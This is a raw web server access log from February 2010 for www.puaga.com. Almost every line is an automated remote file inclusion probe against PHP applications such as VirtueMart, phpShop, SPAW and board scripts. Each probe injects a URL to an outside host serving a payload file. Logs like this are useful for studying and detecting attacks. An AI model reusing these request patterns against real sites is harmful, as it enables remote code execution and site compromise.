200.93.147.154 - - [11/Feb/2010:04:00:22 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:04:00:22 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:04:00:22 -0800] "GET /logs/access_100118.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:00:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:00:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:00:57 -0800] "GET /logs/access_100103.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:01:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:01:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:01:11 -0800] "GET /logs/access_100103.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:01:48 -0800] "GET /logs/access_100126.log/?commonpath=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:01:48 -0800] "GET /logs/?commonpath=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:01:49 -0800] "GET /?commonpath=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:02:03 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:02:03 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:02:03 -0800] "GET /logs/access_100116.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:02:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:02:08 -0800] "GET /logs/access_100104.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:02:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:02:55 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:02:55 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:02:55 -0800] "GET /logs/access_100201.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:02:57 -0800] "GET /logs/access_100126.log/?commonpath=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:02:57 -0800] "GET /logs/?commonpath=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:02:57 -0800] "GET /?commonpath=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [11/Feb/2010:04:03:26 -0800] "GET /logs/access_100107.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:04:53 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:05:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:05:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:05:05 -0800] "GET /logs/access_100201.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:05:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:05:05 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:05:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:04:05:20 -0800] "GET /bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:04:05:21 -0800] "GET /logs//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [11/Feb/2010:04:05:21 -0800] "GET /logs/access_100121.log%20%20//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:05:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:05:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:05:24 -0800] "GET /logs/access_100104.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:06:35 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:06:35 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:06:35 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:06:35 -0800] "GET /index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:06:41 -0800] "GET /logs/access_100112.log%20%20/?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:06:41 -0800] "GET /?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:06:41 -0800] "GET /logs/?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:06:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:06:45 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.172.236.41 - - [11/Feb/2010:04:06:45 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:06:46 -0800] "GET /logs/access_100103.log%20%20/?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:07:06 -0800] "GET /logs/access_100112.log%20%20/?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:07:06 -0800] "GET /logs/?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:07:07 -0800] "GET /?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.106.6.243 - - [11/Feb/2010:04:07:10 -0800] "GET /logs/access_100103.log%20%20/?INCLUDE_FOLDER=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:07:55 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:07:55 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:07:55 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:07:55 -0800] "GET /index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:08:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:08:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:08:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:36 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:37 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:37 -0800] "GET /logs/access_100122.log///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:39 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:39 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:40 -0800] "GET /logs/access_100122.log///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:44 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:44 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:44 -0800] "GET /logs/access_100122.log%20%20///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:46 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:46 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:09:47 -0800] "GET /logs/access_100122.log%20%20///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:10:02 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:10:02 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:10:02 -0800] "GET /logs/access_100122.log///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:10:42 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:10:42 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:10:42 -0800] "GET /logs/access_100114.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:10:59 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:10:59 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:24 -0800] "GET /include/lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:24 -0800] "GET /logs//include/lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:24 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:24 -0800] "GET /logs/access_100122.log///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:25 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:25 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:11:25 -0800] "GET /logs/access_100114.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:11:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:11:26 -0800] "GET /logs/access_100128.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:11:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:11:34 -0800] "GET /logs/access_100112.log%20%20/?INCLUDE_FOLDER=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:11:34 -0800] "GET /logs/?INCLUDE_FOLDER=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:11:35 -0800] "GET /?INCLUDE_FOLDER=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:35 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:35 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:36 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:36 -0800] "GET /logs/access_100122.log%20%20///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:37 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:37 -0800] "GET /logs/access_100122.log///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:38 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:38 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:39 -0800] "GET /logs//include/lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:39 -0800] "GET /logs/access_100123.log%20%20//include/lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:39 -0800] "GET /include/lib.inc.php?site_path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:40 -0800] "GET /logs/access_100122.log%20%20///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:40 -0800] "GET /logs///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:40 -0800] "GET //bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:11:43 -0800] "GET /logs/access_100103.log%20%20/?INCLUDE_FOLDER=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [11/Feb/2010:04:11:45 -0800] "GET /logs/access_100122.log///bbs/skin/write_comment.php?skin_path=http://www.difusion.com.mx/components/com_web/components/com_newsfeeds/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:49 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:11:49 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [11/Feb/2010:04:13:17 -0800] "GET /logs/access_100104.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [11/Feb/2010:04:13:19 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:13:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:13:25 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:13:25 -0800] "GET /logs/access_100201.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:13:25 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:13:25 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:13:25 -0800] "GET /logs/access_100201.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
